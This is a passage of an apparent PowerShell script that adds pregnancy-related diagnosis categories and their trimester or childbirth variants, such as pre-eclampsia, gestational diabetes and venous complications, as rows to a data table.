$DiagnosisList.Rows.Add("Gestational edema with proteinuria","Gestational edema with proteinuria, complicating childbirth") + $null = $DiagnosisList.Rows.Add("Gestational edema with proteinuria","Gestational edema with proteinuria, complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Gestational [pregnancy-induced] hypertension without significant proteinuria","Gestational [pregnancy-induced] hypertension without significant proteinuria, first trimester") + $null = $DiagnosisList.Rows.Add("Gestational [pregnancy-induced] hypertension without significant proteinuria","Gestational [pregnancy-induced] hypertension without significant proteinuria, second trimester") + $null = $DiagnosisList.Rows.Add("Gestational [pregnancy-induced] hypertension without significant proteinuria","Gestational [pregnancy-induced] hypertension without significant proteinuria, third trimester") + $null = $DiagnosisList.Rows.Add("Gestational [pregnancy-induced] hypertension without significant proteinuria","Gestational [pregnancy-induced] hypertension without significant proteinuria, complicating childbirth") + $null = $DiagnosisList.Rows.Add("Gestational [pregnancy-induced] hypertension without significant proteinuria","Gestational [pregnancy-induced] hypertension without significant proteinuria, complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Gestational [pregnancy-induced] hypertension without significant proteinuria","Gestational [pregnancy-induced] hypertension without significant proteinuria, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Mild to moderate pre-eclampsia","Mild to moderate pre-eclampsia, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Mild to moderate pre-eclampsia","Mild to moderate pre-eclampsia, second trimester") + $null = $DiagnosisList.Rows.Add("Mild to moderate pre-eclampsia","Mild to moderate pre-eclampsia, third trimester") + $null = $DiagnosisList.Rows.Add("Mild to moderate pre-eclampsia","Mild to moderate pre-eclampsia, complicating childbirth") + $null = $DiagnosisList.Rows.Add("Mild to moderate pre-eclampsia","Mild to moderate pre-eclampsia, complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Severe pre-eclampsia","Severe pre-eclampsia, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Severe pre-eclampsia","Severe pre-eclampsia, second trimester") + $null = $DiagnosisList.Rows.Add("Severe pre-eclampsia","Severe pre-eclampsia, third trimester") + $null = $DiagnosisList.Rows.Add("Severe pre-eclampsia","Severe pre-eclampsia complicating childbirth") + $null = $DiagnosisList.Rows.Add("Severe pre-eclampsia","Severe pre-eclampsia, complicating the puerperium") + $null = $DiagnosisList.Rows.Add("HELLP syndrome","HELLP syndrome (HELLP), unspecified trimester") + $null = $DiagnosisList.Rows.Add("HELLP syndrome","HELLP syndrome (HELLP), second trimester") + $null = $DiagnosisList.Rows.Add("HELLP syndrome","HELLP syndrome (HELLP), third trimester") + $null = $DiagnosisList.Rows.Add("HELLP syndrome","HELLP syndrome, complicating childbirth") + $null = $DiagnosisList.Rows.Add("HELLP syndrome","HELLP syndrome, complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Unspecified pre-eclampsia","Unspecified pre-eclampsia, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-eclampsia","Unspecified pre-eclampsia, second trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-eclampsia","Unspecified pre-eclampsia, third trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-eclampsia","Unspecified pre-eclampsia, complicating childbirth") + $null = $DiagnosisList.Rows.Add("Unspecified pre-eclampsia","Unspecified pre-eclampsia, complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Eclampsia complicating pregnancy","Eclampsia complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Eclampsia complicating pregnancy","Eclampsia complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Eclampsia complicating pregnancy","Eclampsia complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Eclampsia complicating labor","Eclampsia complicating labor") + $null = $DiagnosisList.Rows.Add("Eclampsia complicating the puerperium","Eclampsia complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Eclampsia, unspecified as to time period","Eclampsia, unspecified as to time period") + $null = $DiagnosisList.Rows.Add("Unspecified maternal hypertension","Unspecified maternal hypertension, first trimester") + $null = $DiagnosisList.Rows.Add("Unspecified maternal hypertension","Unspecified maternal hypertension, second trimester") + $null = $DiagnosisList.Rows.Add("Unspecified maternal hypertension","Unspecified maternal hypertension, third trimester") + $null = $DiagnosisList.Rows.Add("Unspecified maternal hypertension","Unspecified maternal hypertension, complicating childbirth") + $null = $DiagnosisList.Rows.Add("Unspecified maternal hypertension","Unspecified maternal hypertension, complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Unspecified maternal hypertension","Unspecified maternal hypertension, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Hemorrhage in early pregnancy","Threatened abortion") + $null = $DiagnosisList.Rows.Add("Hemorrhage in early pregnancy","Other hemorrhage in early pregnancy") + $null = $DiagnosisList.Rows.Add("Hemorrhage in early pregnancy","Hemorrhage in early pregnancy, unspecified") + $null = $DiagnosisList.Rows.Add("Excessive vomiting in pregnancy","Mild hyperemesis gravidarum") + $null = $DiagnosisList.Rows.Add("Excessive vomiting in pregnancy","Hyperemesis gravidarum with metabolic disturbance") + $null = $DiagnosisList.Rows.Add("Excessive vomiting in pregnancy","Late vomiting of pregnancy") + $null = $DiagnosisList.Rows.Add("Excessive vomiting in pregnancy","Other vomiting complicating pregnancy") + $null = $DiagnosisList.Rows.Add("Excessive vomiting in pregnancy","Vomiting of pregnancy, unspecified") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremity in pregnancy","Varicose veins of lower extremity in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremity in pregnancy","Varicose veins of lower extremity in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremity in pregnancy","Varicose veins of lower extremity in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Varicose veins of lower extremity in pregnancy","Varicose veins of lower extremity in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Genital varices in pregnancy","Genital varices in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Genital varices in pregnancy","Genital varices in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Genital varices in pregnancy","Genital varices in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Genital varices in pregnancy","Genital varices in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Superficial thrombophlebitis in pregnancy","Superficial thrombophlebitis in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Superficial thrombophlebitis in pregnancy","Superficial thrombophlebitis in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Superficial thrombophlebitis in pregnancy","Superficial thrombophlebitis in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Superficial thrombophlebitis in pregnancy","Superficial thrombophlebitis in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Deep phlebothrombosis in pregnancy","Deep phlebothrombosis in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Deep phlebothrombosis in pregnancy","Deep phlebothrombosis in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Deep phlebothrombosis in pregnancy","Deep phlebothrombosis in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Deep phlebothrombosis in pregnancy","Deep phlebothrombosis in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Hemorrhoids in pregnancy","Hemorrhoids in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Hemorrhoids in pregnancy","Hemorrhoids in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Hemorrhoids in pregnancy","Hemorrhoids in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Hemorrhoids in pregnancy","Hemorrhoids in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Cerebral venous thrombosis in pregnancy","Cerebral venous thrombosis in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Cerebral venous thrombosis in pregnancy","Cerebral venous thrombosis in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Cerebral venous thrombosis in pregnancy","Cerebral venous thrombosis in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Cerebral venous thrombosis in pregnancy","Cerebral venous thrombosis in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other venous complications in pregnancy","Other venous complications in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other venous complications in pregnancy","Other venous complications in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other venous complications in pregnancy","Other venous complications in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other venous complications in pregnancy","Other venous complications in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Venous complication in pregnancy, unspecified","Venous complication in pregnancy, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Venous complication in pregnancy, unspecified","Venous complication in pregnancy, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Venous complication in pregnancy, unspecified","Venous complication in pregnancy, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Venous complication in pregnancy, unspecified","Venous complication in pregnancy, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("Infections of kidney in pregnancy","Infections of kidney in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Infections of kidney in pregnancy","Infections of kidney in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Infections of kidney in pregnancy","Infections of kidney in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Infections of kidney in pregnancy","Infections of kidney in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Infections of bladder in pregnancy","Infections of bladder in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Infections of bladder in pregnancy","Infections of bladder in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Infections of bladder in pregnancy","Infections of bladder in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Infections of bladder in pregnancy","Infections of bladder in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Infections of urethra in pregnancy","Infections of urethra in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Infections of urethra in pregnancy","Infections of urethra in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Infections of urethra in pregnancy","Infections of urethra in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Infections of urethra in pregnancy","Infections of urethra in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Infections of other parts of urinary tract in pregnancy","Infections of other parts of urinary tract in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Infections of other parts of urinary tract in pregnancy","Infections of other parts of urinary tract in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Infections of other parts of urinary tract in pregnancy","Infections of other parts of urinary tract in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Infections of other parts of urinary tract in pregnancy","Infections of other parts of urinary tract in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Unspecified infection of urinary tract in pregnancy","Unspecified infection of urinary tract in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified infection of urinary tract in pregnancy","Unspecified infection of urinary tract in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Unspecified infection of urinary tract in pregnancy","Unspecified infection of urinary tract in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Unspecified infection of urinary tract in pregnancy","Unspecified infection of urinary tract in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Infection of cervix in pregnancy","Infections of cervix in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Infection of cervix in pregnancy","Infections of cervix in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Infection of cervix in pregnancy","Infections of cervix in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Infection of cervix in pregnancy","Infections of cervix in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Salpingo-oophoritis in pregnancy","Salpingo-oophoritis in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Salpingo-oophoritis in pregnancy","Salpingo-oophoritis in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Salpingo-oophoritis in pregnancy","Salpingo-oophoritis in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Salpingo-oophoritis in pregnancy","Salpingo-oophoritis in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Infection of other part of genital tract in pregnancy","Infection of other part of genital tract in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Infection of other part of genital tract in pregnancy","Infection of other part of genital tract in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Infection of other part of genital tract in pregnancy","Infection of other part of genital tract in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Infection of other part of genital tract in pregnancy","Infection of other part of genital tract in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified genitourinary tract infection in pregnancy","Unspecified genitourinary tract infection in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified genitourinary tract infection in pregnancy","Unspecified genitourinary tract infection in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Unspecified genitourinary tract infection in pregnancy","Unspecified genitourinary tract infection in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Unspecified genitourinary tract infection in pregnancy","Unspecified genitourinary tract infection in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing type 1 diabetes mellitus, in pregnancy","Pre-existing type 1 diabetes mellitus, in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing type 1 diabetes mellitus, in pregnancy","Pre-existing type 1 diabetes mellitus, in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing type 1 diabetes mellitus, in pregnancy","Pre-existing type 1 diabetes mellitus, in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing type 1 diabetes mellitus, in pregnancy","Pre-existing type 1 diabetes mellitus, in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing type 1 diabetes mellitus, in childbirth","Pre-existing type 1 diabetes mellitus, in childbirth") + $null = $DiagnosisList.Rows.Add("Pre-existing type 1 diabetes mellitus, in the puerperium","Pre-existing type 1 diabetes mellitus, in the puerperium") + $null = $DiagnosisList.Rows.Add("Pre-existing type 2 diabetes mellitus, in pregnancy","Pre-existing type 2 diabetes mellitus, in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing type 2 diabetes mellitus, in pregnancy","Pre-existing type 2 diabetes mellitus, in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing type 2 diabetes mellitus, in pregnancy","Pre-existing type 2 diabetes mellitus, in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing type 2 diabetes mellitus, in pregnancy","Pre-existing type 2 diabetes mellitus, in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing type 2 diabetes mellitus, in childbirth","Pre-existing type 2 diabetes mellitus, in childbirth") + $null = $DiagnosisList.Rows.Add("Pre-existing type 2 diabetes mellitus, in the puerperium","Pre-existing type 2 diabetes mellitus, in the puerperium") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing diabetes mellitus in pregnancy","Unspecified pre-existing diabetes mellitus in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing diabetes mellitus in pregnancy","Unspecified pre-existing diabetes mellitus in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing diabetes mellitus in pregnancy","Unspecified pre-existing diabetes mellitus in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing diabetes mellitus in pregnancy","Unspecified pre-existing diabetes mellitus in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing diabetes mellitus in childbirth","Unspecified pre-existing diabetes mellitus in childbirth") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing diabetes mellitus in the puerperium","Unspecified pre-existing diabetes mellitus in the puerperium") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in pregnancy","Gestational diabetes mellitus in pregnancy, diet controlled") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in pregnancy","Gestational diabetes mellitus in pregnancy, insulin controlled") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in pregnancy","Gestational diabetes mellitus in pregnancy, controlled by oral hypoglycemic drugs") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in pregnancy","Gestational diabetes mellitus in pregnancy, unspecified control") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in childbirth","Gestational diabetes mellitus in childbirth, diet controlled") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in childbirth","Gestational diabetes mellitus in childbirth, insulin controlled") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in childbirth","Gestational diabetes mellitus in childbirth, controlled by oral hypoglycemic drugs") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in childbirth","Gestational diabetes mellitus in childbirth, unspecified control") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in the puerperium","Gestational diabetes mellitus in the puerperium, diet controlled") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in the puerperium","Gestational diabetes mellitus in the puerperium, insulin controlled") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in the puerperium","Gestational diabetes mellitus in puerperium, controlled by oral hypoglycemic drugs") + $null = $DiagnosisList.Rows.Add("Gestational diabetes mellitus in the puerperium","Gestational diabetes mellitus in the puerperium, unspecified control") + $null = $DiagnosisList.Rows.Add("Other pre-existing diabetes mellitus in pregnancy","Other pre-existing diabetes mellitus in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Other pre-existing diabetes mellitus in pregnancy","Other pre-existing diabetes mellitus in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Other pre-existing diabetes mellitus in pregnancy","Other pre-existing diabetes mellitus in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Other pre-existing diabetes mellitus in pregnancy","Other pre-existing diabetes mellitus in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other pre-existing diabetes mellitus in childbirth","Other pre-existing diabetes mellitus in childbirth") + $null = $DiagnosisList.Rows.Add("Other pre-existing diabetes mellitus in the puerperium","Other pre-existing diabetes mellitus in the puerperium") + $null = $DiagnosisList.Rows.Add("Unspecified diabetes mellitus in pregnancy","Unspecified diabetes mellitus in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Unspecified diabetes mellitus in pregnancy","Unspecified diabetes mellitus in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Unspecified diabetes mellitus in pregnancy","Unspecified diabetes mellitus in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Unspecified diabetes mellitus in pregnancy","Unspecified diabetes mellitus in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified diabetes mellitus in childbirth","Unspecified diabetes mellitus in childbirth") + $null = $DiagnosisList.Rows.Add("Unspecified diabetes mellitus in the puerperium","Unspecified diabetes mellitus in the puerperium") + $null = $DiagnosisList.Rows.Add("Malnutrition in pregnancy","Malnutrition in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Malnutrition in pregnancy","Malnutrition in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Malnutrition in pregnancy","Malnutrition in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Malnutrition in pregnancy","Malnutrition in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Malnutrition in childbirth","Malnutrition in childbirth") + $null = $DiagnosisList.Rows.Add("Malnutrition in the puerperium","Malnutrition in the puerperium") + $null = $DiagnosisList.Rows.Add("Excessive weight gain in pregnancy","Excessive weight gain in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Excessive weight gain in pregnancy","Excessive weight gain in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Excessive weight gain in pregnancy","Excessive weight gain in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Excessive weight gain in pregnancy","Excessive weight gain in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Low weight gain in pregnancy","Low weight gain in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Low weight gain in pregnancy","Low weight gain in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Low weight gain in pregnancy","Low weight gain in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Low weight gain in pregnancy","Low weight gain in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy care for patient with recurrent pregnancy loss","Pregnancy care for patient with recurrent pregnancy loss, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy care for patient with recurrent pregnancy loss","Pregnancy care for patient with recurrent pregnancy loss, first trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy care for patient with recurrent pregnancy loss","Pregnancy care for patient with recurrent pregnancy loss, second trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy care for patient with recurrent pregnancy loss","Pregnancy care for patient with recurrent pregnancy loss, third trimester") + $null = $DiagnosisList.Rows.Add("Retained intrauterine contraceptive device in pregnancy","Retained intrauterine contraceptive device in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Retained intrauterine contraceptive device in pregnancy","Retained intrauterine contraceptive device in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Retained intrauterine contraceptive device in pregnancy","Retained intrauterine contraceptive device in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Retained intrauterine contraceptive device in pregnancy","Retained intrauterine contraceptive device in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Herpes gestationis","Herpes gestationis, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Herpes gestationis","Herpes gestationis, first trimester") + $null = $DiagnosisList.Rows.Add("Herpes gestationis","Herpes gestationis, second trimester") + $null = $DiagnosisList.Rows.Add("Herpes gestationis","Herpes gestationis, third trimester") + $null = $DiagnosisList.Rows.Add("Maternal hypotension syndrome","Maternal hypotension syndrome, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Maternal hypotension syndrome","Maternal hypotension syndrome, first trimester") + $null = $DiagnosisList.Rows.Add("Maternal hypotension syndrome","Maternal hypotension syndrome, second trimester") + $null = $DiagnosisList.Rows.Add("Maternal hypotension syndrome","Maternal hypotension syndrome, third trimester") + $null = $DiagnosisList.Rows.Add("Liver and biliary tract disorders in pregnancy","Liver and biliary tract disorders in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Liver and biliary tract disorders in pregnancy","Liver and biliary tract disorders in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Liver and biliary tract disorders in pregnancy","Liver and biliary tract disorders in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Liver and biliary tract disorders in pregnancy","Liver and biliary tract disorders in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Liver and biliary tract disorders in childbirth","Liver and biliary tract disorders in childbirth") + $null = $DiagnosisList.Rows.Add("Liver and biliary tract disorders in the puerperium","Liver and biliary tract disorders in the puerperium") + $null = $DiagnosisList.Rows.Add("Subluxation of symphysis (pubis) in pregnancy","Subluxation of symphysis (pubis) in pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Subluxation of symphysis (pubis) in pregnancy","Subluxation of symphysis (pubis) in pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Subluxation of symphysis (pubis) in pregnancy","Subluxation of symphysis (pubis) in pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Subluxation of symphysis (pubis) in pregnancy","Subluxation of symphysis (pubis) in pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Subluxation of symphysis (pubis) in childbirth","Subluxation of symphysis (pubis) in childbirth") + $null = $DiagnosisList.Rows.Add("Subluxation of symphysis (pubis) in the puerperium","Subluxation of symphysis (pubis) in the puerperium") + $null = $DiagnosisList.Rows.Add("Pregnancy related exhaustion and fatigue","Pregnancy related exhaustion and fatigue, first trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related exhaustion and fatigue","Pregnancy related exhaustion and fatigue, second trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related exhaustion and fatigue","Pregnancy related exhaustion and fatigue, third trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related exhaustion and fatigue","Pregnancy related exhaustion and fatigue, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related peripheral neuritis","Pregnancy related peripheral neuritis, first trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related peripheral neuritis","Pregnancy related peripheral neuritis, second trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related peripheral neuritis","Pregnancy related peripheral neuritis, third trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related peripheral neuritis","Pregnancy related peripheral neuritis, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related renal disease","Pregnancy related renal disease, first trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related renal disease","Pregnancy related renal disease, second trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related renal disease","Pregnancy related renal disease, third trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related renal disease","Pregnancy related renal disease, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Uterine size-date discrepancy complicating pregnancy","Uterine size-date discrepancy, first trimester") + $null = $DiagnosisList.Rows.Add("Uterine size-date discrepancy complicating pregnancy","Uterine size-date discrepancy, second trimester") + $null = $DiagnosisList.Rows.Add("Uterine size-date discrepancy complicating pregnancy","Uterine size-date discrepancy, third trimester") + $null = $DiagnosisList.Rows.Add("Uterine size-date discrepancy complicating pregnancy","Uterine size-date discrepancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Spotting complicating pregnancy","Spotting complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Spotting complicating pregnancy","Spotting complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Spotting complicating pregnancy","Spotting complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Spotting complicating pregnancy","Spotting complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pruritic urticarial papules and plaques of pregnancy (PUPPP)","Pruritic urticarial papules and plaques of pregnancy (PUPPP)") + $null = $DiagnosisList.Rows.Add("Cervical shortening","Cervical shortening, second trimester") + $null = $DiagnosisList.Rows.Add("Cervical shortening","Cervical shortening, third trimester") + $null = $DiagnosisList.Rows.Add("Cervical shortening","Cervical shortening, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other specified pregnancy related conditions","Other specified pregnancy related conditions, first trimester") + $null = $DiagnosisList.Rows.Add("Other specified pregnancy related conditions","Other specified pregnancy related conditions, second trimester") + $null = $DiagnosisList.Rows.Add("Other specified pregnancy related conditions","Other specified pregnancy related conditions, third trimester") + $null = $DiagnosisList.Rows.Add("Other specified pregnancy related conditions","Other specified pregnancy related conditions, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related conditions, unspecified","Pregnancy related conditions, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related conditions, unspecified","Pregnancy related conditions, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related conditions, unspecified","Pregnancy related conditions, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Pregnancy related conditions, unspecified","Pregnancy related conditions, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("Abnormal findings on antenatal screening of mother","Abnormal hematological finding on antenatal screening of mother") + $null = $DiagnosisList.Rows.Add("Abnormal findings on antenatal screening of mother","Abnormal biochemical finding on antenatal screening of mother") + $null = $DiagnosisList.Rows.Add("Abnormal findings on antenatal screening of mother","Abnormal cytological finding on antenatal screening of mother") + $null = $DiagnosisList.Rows.Add("Abnormal findings on antenatal screening of mother","Abnormal ultrasonic finding on antenatal screening of mother") + $null = $DiagnosisList.Rows.Add("Abnormal findings on antenatal screening of mother","Abnormal radiological finding on antenatal screening of mother") + $null = $DiagnosisList.Rows.Add("Abnormal findings on antenatal screening of mother","Abnormal chromosomal and genetic finding on antenatal screening of mother") + $null = $DiagnosisList.Rows.Add("Abnormal findings on antenatal screening of mother","Other abnormal findings on antenatal screening of mother") + $null = $DiagnosisList.Rows.Add("Abnormal findings on antenatal screening of mother","Unspecified abnormal findings on antenatal screening of mother") + $null = $DiagnosisList.Rows.Add("Aspiration pneumonitis due to anesthesia during pregnancy","Aspiration pneumonitis due to anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Aspiration pneumonitis due to anesthesia during pregnancy","Aspiration pneumonitis due to anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Aspiration pneumonitis due to anesthesia during pregnancy","Aspiration pneumonitis due to anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Aspiration pneumonitis due to anesthesia during pregnancy","Aspiration pneumonitis due to anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pressure collapse of lung due to anesthesia during pregnancy","Pressure collapse of lung due to anesthesia during pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Pressure collapse of lung due to anesthesia during pregnancy","Pressure collapse of lung due to anesthesia during pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Pressure collapse of lung due to anesthesia during pregnancy","Pressure collapse of lung due to anesthesia during pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pressure collapse of lung due to anesthesia during pregnancy","Pressure collapse of lung due to anesthesia during pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Other pulmonary complications of anesthesia during pregnancy","Other pulmonary complications of anesthesia during 